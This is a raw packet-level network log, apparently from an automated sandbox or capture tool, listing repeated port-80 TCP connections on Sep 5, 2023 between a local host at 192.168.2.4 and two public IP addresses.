                                                                                                                                                    Sep 5, 2023 13:02:25.487806082 CEST8049740104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:25.646537066 CEST8049740104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:25.646569014 CEST8049740104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:25.646702051 CEST4974080192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:25.666799068 CEST4974080192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:25.867501020 CEST4974180192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:25.995997906 CEST8049741172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:25.996215105 CEST4974180192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:25.996526003 CEST4974180192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:25.998500109 CEST4974180192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:26.128556013 CEST8049741172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:26.130363941 CEST8049741172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:26.401204109 CEST8049741172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:26.401240110 CEST8049741172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:26.401405096 CEST4974180192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:26.404597044 CEST4974180192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:26.623656034 CEST4974280192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:26.751969099 CEST8049742172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:26.752245903 CEST4974280192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:26.752743959 CEST4974280192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:26.753834009 CEST4974280192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:26.882263899 CEST8049742172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:26.883294106 CEST8049742172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:27.148981094 CEST8049742172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:27.149017096 CEST8049742172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:27.149132013 CEST4974280192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:27.155373096 CEST4974280192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:27.333154917 CEST4974380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:27.462213039 CEST8049743172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:27.462589025 CEST4974380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:27.463099003 CEST4974380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:27.464889050 CEST4974380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:27.591378927 CEST8049743172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:27.593111038 CEST8049743172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:27.864033937 CEST8049743172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:27.864068031 CEST8049743172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:27.864219904 CEST4974380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:27.868284941 CEST4974380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:28.075856924 CEST4974480192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:28.207576990 CEST8049744104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:28.207792997 CEST4974480192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:28.208111048 CEST4974480192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:28.209821939 CEST4974480192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:28.336607933 CEST8049744104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:28.338232040 CEST8049744104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:28.619004965 CEST8049744104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:28.619040012 CEST8049744104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:28.619221926 CEST4974480192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:28.621248007 CEST4974480192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:28.783962965 CEST4974580192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:28.912518024 CEST8049745104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:28.912828922 CEST4974580192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:28.913234949 CEST4974580192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:28.915260077 CEST4974580192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:29.041630983 CEST8049745104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:29.043687105 CEST8049745104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:29.344266891 CEST8049745104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:29.344326973 CEST8049745104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:29.344470024 CEST4974580192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:29.347096920 CEST4974580192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:29.524590969 CEST4974680192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:29.653542042 CEST8049746104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:29.653872967 CEST4974680192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:29.654974937 CEST4974680192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:29.656461000 CEST4974680192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:29.783472061 CEST8049746104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:29.784889936 CEST8049746104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:30.049473047 CEST8049746104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:30.049539089 CEST8049746104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:30.049695969 CEST4974680192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:30.051754951 CEST4974680192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:30.305722952 CEST4974780192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:30.434305906 CEST8049747104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:30.434528112 CEST4974780192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:30.497769117 CEST4974780192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:30.498931885 CEST4974780192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:30.626365900 CEST8049747104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:30.627305031 CEST8049747104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:30.906497002 CEST8049747104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:30.906534910 CEST8049747104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:30.906693935 CEST4974780192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:30.909008980 CEST4974780192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:31.700370073 CEST4974880192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:31.829058886 CEST8049748172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:31.829283953 CEST4974880192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:31.868135929 CEST4974880192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:31.869343996 CEST4974880192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:31.996678114 CEST8049748172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:31.997773886 CEST8049748172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:32.269529104 CEST8049748172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:32.269563913 CEST8049748172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:32.269639015 CEST4974880192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:32.271749973 CEST4974880192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:34.697504044 CEST4974980192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:34.826857090 CEST8049749104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:34.827176094 CEST4974980192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:34.827600956 CEST4974980192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:34.828911066 CEST4974980192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:34.956043005 CEST8049749104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:34.956255913 CEST4974980192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:34.957362890 CEST8049749104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:34.957472086 CEST8049749104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:34.957494974 CEST4974980192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:34.957530975 CEST8049749104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:34.957555056 CEST8049749104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:34.957562923 CEST4974980192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:34.957626104 CEST4974980192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:34.957633018 CEST8049749104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:34.957653999 CEST8049749104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:34.957674980 CEST8049749104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:35.085031986 CEST8049749104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:35.085839987 CEST8049749104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:35.085941076 CEST8049749104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:35.086117983 CEST8049749104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:35.086133957 CEST8049749104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:35.086257935 CEST8049749104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:35.421880007 CEST8049749104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:35.421907902 CEST8049749104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:35.422059059 CEST4974980192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:35.424618006 CEST4974980192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:35.624172926 CEST4975080192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:35.755808115 CEST8049750172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:35.756062031 CEST4975080192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:35.757108927 CEST4975080192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:35.759838104 CEST4975080192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:35.888932943 CEST8049750172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:35.891885996 CEST8049750172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:36.162883997 CEST8049750172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:36.162936926 CEST8049750172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:36.163294077 CEST4975080192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:36.166671038 CEST4975080192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:36.362627983 CEST4975180192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:36.490886927 CEST8049751104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:36.491117954 CEST4975180192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:36.491511106 CEST4975180192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:36.492686033 CEST4975180192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:36.619597912 CEST8049751104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:36.620656013 CEST8049751104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:36.883812904 CEST8049751104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:36.883862972 CEST8049751104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:36.884083033 CEST4975180192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:36.887567043 CEST4975180192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:37.653467894 CEST4975280192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:37.784272909 CEST8049752104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:37.784498930 CEST4975280192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:37.785239935 CEST4975280192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:37.786729097 CEST4975280192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:37.913739920 CEST8049752104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:37.915051937 CEST8049752104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:38.206876993 CEST8049752104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:38.206954956 CEST8049752104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:38.207221985 CEST4975280192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:38.212802887 CEST4975280192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:38.375396967 CEST4975380192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:38.507054090 CEST8049753104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:38.507313967 CEST4975380192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:38.509397984 CEST4975380192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:38.511251926 CEST4975380192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:38.637885094 CEST8049753104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:38.639657021 CEST8049753104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:38.906524897 CEST8049753104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:38.906574011 CEST8049753104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:38.906744003 CEST4975380192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:38.910033941 CEST4975380192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:39.098964930 CEST4975480192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:39.227293015 CEST8049754104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:39.227576017 CEST4975480192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:39.227941036 CEST4975480192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:39.230526924 CEST4975480192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:39.359509945 CEST8049754104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:39.360584021 CEST8049754104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:39.628711939 CEST8049754104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:39.628776073 CEST8049754104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:39.628932953 CEST4975480192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:39.634754896 CEST4975480192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:39.791939974 CEST4975580192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:39.923279047 CEST8049755104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:39.923451900 CEST4975580192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:39.923727989 CEST4975580192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:39.925218105 CEST4975580192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:40.052196980 CEST8049755104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:40.053210974 CEST8049755104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:40.328150988 CEST8049755104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:40.328222036 CEST8049755104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:40.328361034 CEST4975580192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:40.330380917 CEST4975580192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:40.518433094 CEST4975680192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:40.648230076 CEST8049756104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:40.648441076 CEST4975680192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:40.648803949 CEST4975680192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:40.649852991 CEST4975680192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:40.776906013 CEST8049756104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:40.777929068 CEST8049756104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:40.955079079 CEST8049756104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:40.955123901 CEST8049756104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:40.955399036 CEST4975680192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:40.961324930 CEST4975680192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:41.166831017 CEST4975780192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:41.295336008 CEST8049757172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:41.295675993 CEST4975780192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:41.297550917 CEST4975780192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:41.299176931 CEST4975780192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:41.430170059 CEST8049757172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:41.430295944 CEST8049757172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:41.616164923 CEST8049757172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:41.616200924 CEST8049757172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:41.616305113 CEST4975780192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:41.618910074 CEST4975780192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:41.839416027 CEST4975880192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:41.968080997 CEST8049758172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:41.968267918 CEST4975880192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:41.968569994 CEST4975880192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:41.969425917 CEST4975880192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:42.099853992 CEST8049758172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:42.101263046 CEST8049758172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:42.407244921 CEST8049758172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:42.407289028 CEST8049758172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:42.407486916 CEST4975880192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:42.410212994 CEST4975880192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:42.605592966 CEST4975980192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:42.734476089 CEST8049759172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:42.734791994 CEST4975980192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:42.735210896 CEST4975980192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:42.736463070 CEST4975980192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:42.865040064 CEST8049759172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:42.865964890 CEST8049759172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:43.156150103 CEST8049759172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:43.156187057 CEST8049759172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:43.156352997 CEST4975980192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:43.158521891 CEST4975980192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:43.418387890 CEST4976080192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:43.546804905 CEST8049760104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:43.547054052 CEST4976080192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:43.547434092 CEST4976080192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:43.548638105 CEST4976080192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:43.677272081 CEST8049760104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:43.677891016 CEST8049760104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:43.981542110 CEST8049760104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:43.981659889 CEST8049760104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:43.981832027 CEST4976080192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:43.984941959 CEST4976080192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:44.183310986 CEST4976180192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:44.311610937 CEST8049761172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:44.311881065 CEST4976180192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:44.424302101 CEST4976180192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:44.425565004 CEST4976180192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:44.552737951 CEST8049761172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:44.553659916 CEST8049761172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:44.868376017 CEST8049761172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:44.868418932 CEST8049761172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:44.868554115 CEST4976180192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:44.870738983 CEST4976180192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:45.065278053 CEST4976280192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:45.193548918 CEST8049762172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:45.193880081 CEST4976280192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:45.194621086 CEST4976280192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:45.197458029 CEST4976280192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:45.326796055 CEST8049762172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:45.328205109 CEST8049762172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:45.621404886 CEST8049762172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:45.621473074 CEST8049762172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:45.621671915 CEST4976280192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:45.627885103 CEST4976280192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:45.834315062 CEST4976380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:45.963068008 CEST8049763172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:45.963339090 CEST4976380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:45.963816881 CEST4976380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:45.965296984 CEST4976380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:46.094916105 CEST8049763172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:46.095640898 CEST8049763172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:46.380932093 CEST8049763172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:46.381072998 CEST8049763172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:46.381339073 CEST4976380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:46.386782885 CEST4976380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:02:46.583591938 CEST4976480192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:46.712075949 CEST8049764104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:46.712363005 CEST4976480192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:46.712899923 CEST4976480192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:46.714171886 CEST4976480192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:46.843671083 CEST8049764104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:46.844779015 CEST8049764104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:47.141078949 CEST8049764104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:47.141140938 CEST8049764104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:47.141454935 CEST4976480192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:47.146802902 CEST4976480192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:47.308374882 CEST4976580192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:47.439990997 CEST8049765104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:47.440237999 CEST4976580192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:47.441241980 CEST4976580192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:47.443515062 CEST4976580192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:47.573101044 CEST8049765104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:47.575483084 CEST8049765104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:47.918494940 CEST8049765104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:02:47.918539047 CEST8049765104.21.60.111192.168.2.4
